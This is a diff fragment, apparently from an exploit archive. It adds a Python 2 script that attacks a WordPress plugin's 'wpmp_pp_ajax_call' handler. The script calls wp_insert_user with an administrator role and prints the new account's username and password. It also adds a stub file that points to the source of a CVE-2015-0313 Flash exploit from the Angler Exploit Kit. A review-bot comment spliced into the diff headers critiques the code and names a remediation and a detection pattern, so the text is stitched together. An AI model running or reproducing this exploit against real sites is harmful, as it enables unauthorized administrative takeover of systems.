+commandList.add_option('-t', '--target', action="store",
+ help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
+ )
+commandList.add_option('--timeout', action="store", default=10, type="int",
+ help="[Timeout Value] - Default 10",
+ )
+
+options, remainder = commandList.parse_args()
+
+# Check args
+if not options.target:
+ print(banner)
+ commandList.print_help()
+ sys.exit(1)
+
+host = checkurl(options.target)
+timeout = options.timeout
+
+print(banner)
+
+socket.setdefaulttimeout(timeout)
+
+username = id_generator()
+pwd = id_generator()
+
+body = urllib.urlencode({'action' : 'wpmp_pp_ajax_call',
+ 'execute' : 'wp_insert_user',
+ 'user_login' : username,
+ 'user_pass' : pwd,
+ 'role' : 'administrator'})
+
+headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
+
+print "[+] Tryng to connect to: "+host
+try:
+ req = urllib2.Request(host+"/", body, headers)
+ response = urllib2.urlopen(req)
+ html = response.read()
+
+ if html == "":
+ print("[!] Account Added")
+ print("[!] Location: "+host+"/wp-login.php")
+ print("[!] Username: "+username)
+ print("[!] Password: "+pwd)
+ else:
+ print("[X] Exploitation Failed :(")
+
+except urllib2.HTTPError as e:
+ print("[X] "+str(e))
+except urllib2.URLError as e:
+ print("[X] Connection Error: "+str(e))
+
diff --git a/platforms/windows/remote/36491.txt b/platforms/windows/remote/36491.txt
new file mode 100755
index 000000000..7075c5654
--- /dev/null
+++ b/platforms/windows/remote/36491.txt
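Review bot: `checkfile` calls `os.path.isfile` and `os.access` but `os` is never imported (the file imports only urllib, urllib2, socket, sys, string, random and optparse), so any call would raise NameError; nothing in the file calls it, so either drop the function or add `import os` next to `import sys`. Its condition is also wrong for the case its own message describes: `not os.path.isfile(file) and not os.access(file, os.R_OK)` is False for a file that exists but is unreadable, so it should read `if not (os.path.isfile(file) and os.access(file, os.R_OK)):`. The header comment quotes the vulnerable dispatch `call_user_func($_POST['execute'], $_POST)` from cart.php without saying what the fix looks like; a one-line note that the plugin-side remediation is an explicit allow-list of dispatchable function names (and that `action=wpmp_pp_ajax_call` with an `execute=` parameter naming a WordPress function is the request pattern defenders can alert on) would make the entry more useful beyond reproduction. As a point of style, the file mixes the Python 2 `print "[+] Tryng to connect to: "+host` statement with `print(...)` calls; the statement form is the only thing pinning the script to Python 2, and "Tryng" should be "Trying".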
@@ -0,0 +1,11 @@
+Source: https://github.com/SecurityObscurity/cve-2015-0313
+
+PoC: http://www.exploit-db.com/sploits/36491.zip
+
+Adobe Flash vulnerability source code (cve-2015-0313) from Angler Exploit Kit
+
+Reference:
+
+http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers-new-adobe-flash-zero-day-exploit-used-in-malvertisements/
+http://malware.dontneedcoffee.com/2015/02/cve-2015-0313-flash-up-to-1600296-and.html
+https://helpx.adobe.com/security/products/flash-player/apsa15-02.html